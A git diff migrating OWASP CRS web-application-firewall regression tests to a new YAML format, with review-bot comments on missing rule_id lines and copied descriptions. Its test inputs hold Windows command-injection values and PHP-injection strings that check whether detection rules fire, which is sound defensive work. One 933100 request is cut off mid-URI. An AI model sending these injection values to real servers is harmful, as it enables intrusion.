text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?view%3Dimage.jpg%26bcdboot%20%2Fr%20file.txt" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
"/get?view%3Dimage.jpg%26bcdboot%20%2Fr%20file.txt" + version: HTTP/1.0 + output: + log_contains: id "932380" + - test_id: 3 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot/r file.txt Match bcdboot with argument without preceding space stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?view%3Dimage.jpg%26bcdboot%2Fr%20file.txt" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?view%3Dimage.jpg%26bcdboot%2Fr%20file.txt" + version: HTTP/1.0 + output: + log_contains: id "932380" + - test_id: 4 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot /r file.txt Match bcdboot with argument with multiple preceding space stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?view%3Dimage.jpg%26bcdboot%20%20%2Fr%20file.txt" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?view%3Dimage.jpg%26bcdboot%20%20%2Fr%20file.txt" + 
version: HTTP/1.0 + output: + log_contains: id "932380" + - test_id: 5 desc: | Windows shell command injection with 'sort' (false positive): sort%3Dex%26sort%3Dascending Do not match query parameter stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/www/delivery/lg.php?bannerid=18&campaignid=1&zoneid=4&loc=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Ddescending&referer=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Dascending&cb=7de91ea349" - version: HTTP/1.0 - output: - no_log_contains: id "932380" - - test_title: 932380-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/www/delivery/lg.php?bannerid=18&campaignid=1&zoneid=4&loc=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Ddescending&referer=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Dascending&cb=7de91ea349" + version: HTTP/1.0 + output: + no_log_contains: id "932380" + - test_id: 6 desc: | Windows shell command injection with 'sort' (false positive): sort%3D0 Do not match encoded path stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS 
test agent" - method: GET - port: 80 - uri: "/get/url%2Fbla%3Ftest%3D1%26sort%3D0" - version: HTTP/1.0 - output: - no_log_contains: id "932380" - - test_title: 932380-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/url%2Fbla%3Ftest%3D1%26sort%3D0" + version: HTTP/1.0 + output: + no_log_contains: id "932380" + - test_id: 7 desc: "Windows shell command injection using 'bcdboot'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test@coreruleset.org\"|bcdboot %SYSTEMROOT%\\win.ini" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test@coreruleset.org\"|bcdboot %SYSTEMROOT%\\win.ini" + version: HTTP/1.0 + output: + log_contains: id "932380" + - test_id: 8 desc: False positive against 'time warner' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+warner+" - version: HTTP/1.1 - output: - no_log_contains: "id \"932380\"" - - test_title: 932380-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS 
test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+warner+" + version: HTTP/1.1 + output: + no_log_contains: "id \"932380\"" + - test_id: 9 desc: False positive against 'time for' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.1 - data: | - payload=While this is a challenging time for us all, we are busy helping customers manage playout infrastructure in ways that were just dreams only a couple of years ago. - output: - no_log_contains: "id \"932380\"" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + data: | + payload=While this is a challenging time for us all, we are busy helping customers manage playout infrastructure in ways that were just dreams only a couple of years ago. + output: + no_log_contains: "id \"932380\"" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml index c586dec53..edc0a1e83 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml 
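Review bot: The rewritten `output` lines in this hunk spell the same matcher two ways: tests 1–7 use the plain scalar `log_contains: id "932380"` / `no_log_contains: id "932380"`, while tests 8 and 9 use the double-quoted form `no_log_contains: "id \"932380\""`. Both parse to the identical string, so this is style only, but since the migration already re-emits every stage line it is the cheapest moment to settle on one form; the plain form used by the rest of the file, `no_log_contains: id "932380"`, would do. Test 9 also places `version: HTTP/1.1` before `data: |`, unlike tests 1–8 where `data` precedes `version`.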
@@ -2,150 +2,140 @@ meta: author: "csanders-git, Franziska Bühler, azurit" description: None - enabled: true - name: 933100.yaml tests: - - test_title: 933100-1 + - test_id: 1 desc: PHP Injection Attack (933100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo= + - ------WebKitFormBoundaryoRWIb3busvBrbttO-- - version: HTTP/1.1 - output: - log_contains: id "933111" + ------WebKitFormBoundaryoRWIb3busvBrbttO-- + version: HTTP/1.1 + output: + log_contains: id "933111" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml index a9661c56c..82116d6ea 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml 
@@ -2,168 +2,157 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 933120.yaml tests: - - test_title: 933120-1 + - test_id: 1 desc: "PHP Injection Attack: Configuration Directive" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=opcache.jit_max_polymorphic_calls%3d50" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=opcache.jit_max_polymorphic_calls%3d50" + version: HTTP/1.0 + output: + log_contains: id "933120" + - test_id: 2 desc: "Test correct logging" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=session.referer_check%3dtrue" - version: HTTP/1.0 - output: - no_log_contains: = found within - - test_title: 933120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=session.referer_check%3dtrue" + version: HTTP/1.0 + output: + 
no_log_contains: = found within + - test_id: 3 desc: "PHP Injection Attack: Configuration Directive: engine" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=engine%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=engine%3dtrue" + version: HTTP/1.0 + output: + log_contains: id "933120" + - test_id: 4 desc: "PHP Injection Attack: Configuration Directive: extension" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=extension%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=extension%3dtrue" + version: HTTP/1.0 + output: + log_contains: id "933120" + - test_id: 5 desc: "PHP Injection Attack: Configuration Directive: mbstring.regex_retry_limit" stages: - - stage: - input: - dest_addr: 
127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=mbstring.regex_retry_limit%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=mbstring.regex_retry_limit%3dtrue" + version: HTTP/1.0 + output: + log_contains: id "933120" + - test_id: 6 desc: "PHP Injection Attack: Configuration Directive: mbstring.regex_stack_limit" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=mbstring.regex_stack_limit%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=mbstring.regex_stack_limit%3dtrue" + version: HTTP/1.0 + output: + log_contains: id "933120" + - test_id: 7 desc: "PHP Injection Attack: Configuration Directive: precision" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, 
must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=precision%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=precision%3dtrue" + version: HTTP/1.0 + output: + log_contains: id "933120" + - test_id: 8 desc: "PHP Injection Attack: Configuration Directive: smtp" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - port: 80 - data: "var=smtp%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" - - test_title: 933120-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=smtp%3dtrue" + version: HTTP/1.0 + output: + log_contains: id "933120" + - test_id: 9 desc: "PHP Injection Attack: Configuration Directive: unserialize_max_depth" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - 
method: POST - uri: "/post" - port: 80 - data: "var=unserialize_max_depth%3dtrue" - version: HTTP/1.0 - output: - log_contains: id "933120" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: "var=unserialize_max_depth%3dtrue" + version: HTTP/1.0 + output: + log_contains: id "933120" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml index f2d3f9436..e0cf5b0df 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933130.yaml 
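Review bot: The meta block at the top of this hunk removes `enabled: true` and `name: 933120.yaml` but adds no `rule_id: 933120`, whereas every other file in this patch that drops those two keys gains a `+rule_id:` line (932321, 932330, 932331, 932370, 932380, 933130). The hunk header `-2,168 +2,157` is consistent with that omission: two meta lines plus nine `- stage:` lines removed and nothing added in their place. If the runner derives test names or selection from `rule_id`, this file's tests would be the odd ones out; the fix is the single line `rule_id: 933120` after `description: None`. The 933100.yaml hunk earlier on this page shows the same removal without a `rule_id` line, though its body is not fully visible here.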
@@ -2,102 +2,95 @@ meta: author: "csanders-git, azurit" description: Tests functionality of 933130 - enabled: true - name: 933130.yaml +rule_id: 933130 tests: - - test_title: 933130-1 + - test_id: 1 desc: Basic Request nothing should trigger stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933130" - - test_title: 933130-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "933130" + - test_id: 2 desc: Trigger a basic request stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_SERVER['test'];" - version: "HTTP/1.1" - output: - log_contains: id "933130" - - test_title: 933130-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_SERVER['test'];" + version: "HTTP/1.1" + output: + log_contains: id "933130" + - test_id: 3 desc: Non-Server Request stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_SE%20RVER['test'];" - 
version: "HTTP/1.1" - output: - no_log_contains: id "933130" - - test_title: 933130-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_SE%20RVER['test'];" + version: "HTTP/1.1" + output: + no_log_contains: id "933130" + - test_id: 4 desc: SERVER request URLEncoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_%53ERVER['test'];" - version: "HTTP/1.1" - output: - log_contains: id "933130" - - test_title: 933130-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_%53ERVER['test'];" + version: "HTTP/1.1" + output: + log_contains: id "933130" + - test_id: 5 desc: SERVER request URLEncoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?%24_COOKIE=value;" - version: "HTTP/1.1" - output: - log_contains: id "933130" - - test_title: 933130-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?%24_COOKIE=value;" + version: "HTTP/1.1" + output: + log_contains: id "933130" + - test_id: 6 desc: SERVER index listed with obfuscated SERVER stages: - 
- stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_%53%20ERVER['request_uri'];" - version: "HTTP/1.1" - output: - no_log_contains: id "933130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_%53%20ERVER['request_uri'];" + version: "HTTP/1.1" + output: + no_log_contains: id "933130"
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml
index 6bc3f6ca6..901d43f5d 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933131.yaml
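Review bot: Tests 4 and 5 carry the same `desc: SERVER request URLEncoded`, but test 5's request is `/get?%24_COOKIE=value;`, which exercises `$_COOKIE` rather than `$_SERVER`, so the description does not say what the payload tests; something like `desc: COOKIE request URLEncoded` would. The same copy-paste appears in the 933131.yaml hunk (tests 1 and 2). These are context lines the commit carries over unchanged, so the wording issue is pre-existing, but the format migration already touches every test entry and is a cheap moment to fix it.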
@@ -2,54 +2,50 @@ meta: author: "csanders-git, azurit" description: Tests functionality of stricter sibling 933131 - enabled: true - name: 933131.yaml +rule_id: 933131 tests: - - test_title: 933131-1 + - test_id: 1 desc: SERVER request URLEncoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_%53ERVER['test'];" - version: "HTTP/1.1" - output: - no_log_contains: id "933131" - - test_title: 933131-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_%53ERVER['test'];" + version: "HTTP/1.1" + output: + no_log_contains: id "933131" + - test_id: 2 desc: SERVER request URLEncoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?%24_COOKIE=value;" - version: "HTTP/1.1" - output: - no_log_contains: id "933131" - - test_title: 933131-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?%24_COOKIE=value;" + version: "HTTP/1.1" + output: + no_log_contains: id "933131" + - test_id: 3 desc: SERVER index listed with obfuscated SERVER stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$_%53%20ERVER['REQUEST_URI'];" - version: "HTTP/1.1" - output: - log_contains: id "933131" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$_%53%20ERVER['REQUEST_URI'];" + version: "HTTP/1.1" + output: + log_contains: id "933131"
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml
index 9db6f3c0d..64ffb4460 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml
@@ -2,24 +2,21 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 933140.yaml tests: - - test_title: 933140-1 + - test_id: 1 desc: "PHP Injection Attack: I/O Stream" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=php://stdout" - version: HTTP/1.0 - output: - log_contains: id "933140" + - input: + dest_addr: 127.0.0.1 + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=php://stdout" + version: HTTP/1.0 + output: + log_contains: id "933140"
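Review bot: The `meta` block of 933140.yaml drops `name: 933140.yaml` but, unlike the 933130.yaml and 933131.yaml hunks, gains no `rule_id: 933140` line, while the test below is now identified only by `test_id: 1`. If the runner builds the full test name from `meta.rule_id` plus `test_id`, the tests in this file can no longer be addressed individually (for example by an override file), so the omission looks like a slip in the migration rather than a deliberate difference; the 933150.yaml and 933151.yaml hunks have the same gap. Suggest adding `rule_id: 933140` after `description: None` here, and the matching value in the other two files, unless the runner is known to fall back to the file name.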
